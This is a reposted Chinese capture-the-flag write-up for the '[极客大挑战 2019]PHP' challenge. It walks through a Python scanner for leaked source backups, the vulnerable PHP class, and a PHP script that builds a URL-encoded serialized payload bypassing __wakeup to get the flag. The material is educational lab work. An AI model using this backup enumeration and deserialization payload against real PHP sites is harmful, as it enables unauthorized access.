[极客大挑战 2019]PHP
Posted H3rmesk1t
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[极客大挑战 2019]PHP相关的知识,希望对你有一定的参考价值。
考点
PHP反序列化
思路
题目提示有一个备份文件的好习惯,所以我们用脚本跑一下试试
# 常见的网站源码备份文件后缀
# tar
# tar.gz
# zip
# rar
# 常见的网站源码备份文件名
# web
# website
# backup
# back
# www
# wwwroot
# temp
import requests
url = "http://fa5574d9-08a0-4542-bdb3-b87a78f78258.node3.buuoj.cn/"
li1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
li2 = ['tar', 'tar.gz', 'zip', 'rar']
number = 1
for i in li1:
for j in li2:
url_final = url + "/" + i + "." + j
r = requests.get(url_final)
print(r,' ',i,' ',j)
我们发现存在www.zip备份文件,我们下载下来看看,flag.php一看就是假的flag,我们重点关注class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
分析代码逻辑:
password要为100,username要为admin;且需绕过__wakeup函数,在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行;注意到private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见,因此私有字段的字段名在序列化时,类名和字段名前面都会加上0的前缀,字符串长度也包括所加前缀的长度,在php版本大于7.1中我们也可以采用将字段名private和protect换成字段名public来绕过
Payload
<?php
class Name{
private $username = 'admin';
private $password = '100';
}
$a = str_replace(":2:", ":3:", (string)(serialize(new Name)));
$a = urlencode(($a));
echo $a;
?>
Payload:O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
以上是关于[极客大挑战 2019]PHP的主要内容,如果未能解决你的问题,请参考以下文章
[HCTF 2018]WarmUp&[极客大挑战 2019]Knife&[极客大挑战 2019]Secret File&[极客大挑战 2019]BuyFlag